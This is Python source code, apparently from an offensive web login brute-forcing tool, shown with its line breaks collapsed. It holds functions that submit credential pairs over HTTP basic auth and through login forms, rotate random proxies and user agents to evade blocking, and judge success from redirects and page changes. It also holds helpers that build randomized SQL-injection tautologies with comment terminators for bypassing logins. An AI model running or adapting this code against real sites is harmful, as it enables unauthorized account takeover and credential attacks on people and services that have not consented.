def submit(options, login_field, creds, result): password, username = creds if username in [x[1] for x in list(result.queue)]: return True try: proc = Browser() if options.proxy: proxyAddr = list_choose_randomly(options.proxy) proc.set_random_proxy(proxyAddr) else: proxyAddr = "" resp = proc.open_url(options.url, auth=(username, password)) if resp.status_code == 401: if options.verbose: events.fail("['%s':%s'] <==> %s" % (username, password, proxyAddr), title=proc.get_title()) elif resp.status_code > 400: events.error( "[%s] ['%s': '%s']" % (proc.get_url(), username, password), "%s" % resp.status_code) else: events.found(username, password, proc.get_title()) result.put([options.url, username, password]) except Exception as error: events.error("%s" % (error), "BRUTE") return False finally: proc.close()
def random_user_agent(): """ Generate agent of client randomly :return: string = agent value (PC) """ # TODO better useragent with library (or create my own - takes time) from cores.actions import list_choose_randomly return list_choose_randomly(data.getAgent().split("\n"))
def sCon(): conType = list_choose_randomly(["equal", "static", "compare"]) # Could be faster than create a dict and call element from dict if conType == "static": return list_choose_randomly(["not false", "true"]) elif conType == "compare": genType = list_choose_randomly(["like", "rlike", "not like", "gl"]) if genType == "gl": _stri1, _stri2 = string_gen_randomly( select_type="dig"), string_gen_randomly(select_type="dig") if int(_stri1) > int(_stri2): return "%s > %s" % (_stri1, _stri2) else: return "%s > %s" % (_stri2, _stri1) elif genType == "not like": while True: _stri1, _stri2 = string_gen_randomly( select_type="char"), string_gen_randomly( select_type="char") # MAKE SURE WE ARE HAVING NOT LIKE if _stri1 != _stri2: break return "'%s' %s '%s'" % (_stri1, genType, _stri2) else: _stri = string_gen_randomly(len_min=3, len_max=5, select_type="char") return "'%s' %s '%s'" % (_stri, genType, _stri) elif conType == "equal": genType = list_choose_randomly(["char", "dig"]) _stri = string_gen_randomly(len_min=3, len_max=5, select_type=genType) if genType == "char": return "'%s'='%s'" % (_stri, _stri) elif genType == "dig": return "%s=%s" % (_stri, _stri)
def sEnd(): return list_choose_randomly(["-- --", "#", "--"])
def cCon(): return list_choose_randomly(["or", "||"])
def submit(options, login_field, tryCred, result): password, username = tryCred if username in [x[1] for x in list(result.queue)]: return True from cores.browser import Browser isLoginSuccess = "False" try: proc = Browser() if options.proxy: # Set proxy connect proxy_address = list_choose_randomly(options.proxy) proc.set_random_proxy(proxy_address) else: proxy_address = "" proc.open_url(options.url) _form = find_login_form(proc.forms()) if not _form: options.block_text = proc.get_response( ) # TODO check if block text changes if options.verbose: isLoginSuccess = "blocked" events.error("Get blocked", "BRUTE") return False else: form_control, form_fields = _form if options.verbose and login_field != _form: events.info("Login form has been changed", "BRUTE") resp = proc.form_submit(form_control, form_fields, tryCred) from cores.analysis import get_response_diff text_changed, source_changed = get_response_diff( options.txt.decode('utf-8'), resp.content.decode('utf-8')) """ If there is no other login form, check all changes in response If there is no login request from all new urls -> successfully == > Behavior: Login fail, click here or windows.location = login_page """ # "Login form is still there. Oops" if find_login_form(proc.forms()): isLoginForm = True else: isLoginForm = False if not isLoginForm: for new_url in get_redirection(source_changed): if not new_url.startswith("http") and not new_url.endswith( options.exceptions()): try: from urllib.parse import urljoin except ImportError: from urlparse import urljoin new_url = urljoin(options.url, new_url) if new_url and get_domain(options.url) == get_domain(new_url): proc.open_url(new_url) if find_login_form(proc.forms()): isLoginForm = True break else: isLoginForm = False if not isLoginForm: """ Check SQL Injection 1. SQL Injection 2. Login successfully: No SQLi + No Login form """ if check_sqlerror(proc.get_response()): isLoginSuccess = "SQLi" elif text_changed == source_changed and text_changed != options.block_text and options.block_text: pass else: if resp.status_code >= 400: isLoginSuccess = "error" else: isLoginSuccess = "True" # "If we tried login form with username+password field" else: pass return True except Exception as error: """ Sometimes, web servers return error code because of bad configurations, but our cred is true. This code block showing information, for special cases """ isLoginSuccess = "exception" events.error("%s" % (error), "BRUTE") finally: if isLoginSuccess == "SQLi": events.success("SQL Injection bypass", "BRUTE") events.info("['%s': '%s']" % (username, password)) elif isLoginSuccess == "error" and options.verbose: if username: events.error( "['%s':'%s'] <--> %s" % (username, password, proxy_address), "%s" % (resp.status_code)) else: events.error("[%s] <--> %s" % (password, proxy_address), "%s" % (resp.status_code)) elif isLoginSuccess == "True": if username: events.found(username, password, proc.get_title()) result.put([options.url, username, password]) else: events.found('', password, proc.get_title()) result.put([options.url, username, password]) elif isLoginSuccess == "False" and options.verbose: if username: events.fail( "['%s':'%s'] <==> %s" % (username, password, proxy_address), text_changed, proc.get_title()) else: events.fail("['%s'] <==> %s" % (password, proxy_address), text_changed, proc.get_title()) proc.close()